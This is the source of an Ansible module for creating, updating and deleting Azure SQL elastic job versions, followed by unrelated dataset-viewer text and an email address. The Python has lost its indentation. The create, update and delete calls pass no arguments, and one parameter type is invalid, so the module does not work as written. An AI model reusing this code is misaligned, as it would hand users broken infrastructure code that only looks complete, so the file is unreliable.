DOCUMENTATION = '''
---
module: azure_rm_jobversion
version_added: '2.9'
short_description: Manage Azure JobVersion instance.
description:
- 'Create, update and delete instance of Azure JobVersion.'
options:
resource_group_name:
description:
- >-
The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
required: true
type: str
server_name:
description:
- The name of the server.
required: true
type: str
job_agent_name:
description:
- The name of the job agent.
required: true
type: str
job_name:
description:
- The name of the job.
required: true
type: str
job_version:
description:
- The version of the job to get.
required: true
type: integer
state:
description:
- Assert the state of the JobVersion.
- >-
Use C(present) to create or update an JobVersion and C(absent) to delete
it.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- azure
author:
- GuopengLin (@t-glin)
'''
EXAMPLES = '''
'''
RETURN = '''
id:
description:
- Resource ID.
returned: always
type: str
sample: null
name:
description:
- Resource name.
returned: always
type: str
sample: null
type:
description:
- Resource type.
returned: always
type: str
sample: null
'''
import time
import json
import re
from ansible.module_utils.azure_rm_common_ext import AzureRMModuleBaseExt
from copy import deepcopy
try:
from msrestazure.azure_exceptions import CloudError
from azure.mgmt.sql import SqlManagementClient
from msrestazure.azure_operation import AzureOperationPoller
from msrest.polling import LROPoller
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
NoAction, Create, Update, Delete = range(4)
class AzureRMJobVersion(AzureRMModuleBaseExt):
def __init__(self):
self.module_arg_spec = dict(
resource_group_name=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
job_agent_name=dict(
type='str',
required=True
),
job_name=dict(
type='str',
required=True
),
job_version=dict(
type='integer',
required=True
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
)
)
self.resource_group_name = None
self.server_name = None
self.job_agent_name = None
self.job_name = None
self.job_version = None
self.body = {}
self.results = dict(changed=False)
self.mgmt_client = None
self.state = None
self.to_do = Actions.NoAction
super(AzureRMJobVersion, self).__init__(derived_arg_spec=self.module_arg_spec,
supports_check_mode=True,
supports_tags=True)
def exec_module(self, **kwargs):
for key in list(self.module_arg_spec.keys()):
if hasattr(self, key):
setattr(self, key, kwargs[key])
elif kwargs[key] is not None:
self.body[key] = kwargs[key]
self.inflate_parameters(self.module_arg_spec, self.body, 0)
old_response = None
response = None
self.mgmt_client = self.get_mgmt_svc_client(SqlManagementClient,
base_url=self._cloud_environment.endpoints.resource_manager,
api_version='2017-03-01-preview')
old_response = self.get_resource()
if not old_response:
if self.state == 'present':
self.to_do = Actions.Create
else:
if self.state == 'absent':
self.to_do = Actions.Delete
else:
modifiers = {}
self.create_compare_modifiers(self.module_arg_spec, '', modifiers)
self.results['modifiers'] = modifiers
self.results['compare'] = []
if not self.default_compare(modifiers, self.body, old_response, '', self.results):
self.to_do = Actions.Update
if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
self.results['changed'] = True
if self.check_mode:
return self.results
response = self.create_update_resource()
elif self.to_do == Actions.Delete:
self.results['changed'] = True
if self.check_mode:
return self.results
self.delete_resource()
else:
self.results['changed'] = False
response = old_response
return self.results
def create_update_resource(self):
try:
if self.to_do == Actions.Create:
response = self.mgmt_client.job_versions.create()
else:
response = self.mgmt_client.job_versions.update()
if isinstance(response, AzureOperationPoller) or isinstance(response, LROPoller):
response = self.get_poller_result(response)
except CloudError as exc:
self.log('Error attempting to create the JobVersion instance.')
self.fail('Error creating the JobVersion instance: {0}'.format(str(exc)))
return response.as_dict()
def delete_resource(self):
try:
response = self.mgmt_client.job_versions.delete()
except CloudError as e:
self.log('Error attempting to delete the JobVersion instance.')
self.fail('Error deleting the JobVersion instance: {0}'.format(str(e)))
return True
def get_resource(self):
try:
response = self.mgmt_client.job_versions.get(resource_group_name=self.resource_group_name,
server_name=self.server_name,
job_agent_name=self.job_agent_name,
job_name=self.job_name,
job_version=self.job_version)
except CloudError as e:
return False
return response.as_dict()
def main():
AzureRMJobVersion()
if __name__ == '__main__':
main()
|
[
"xiuxi.sun@qq.com"
] |
xiuxi.sun@qq.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.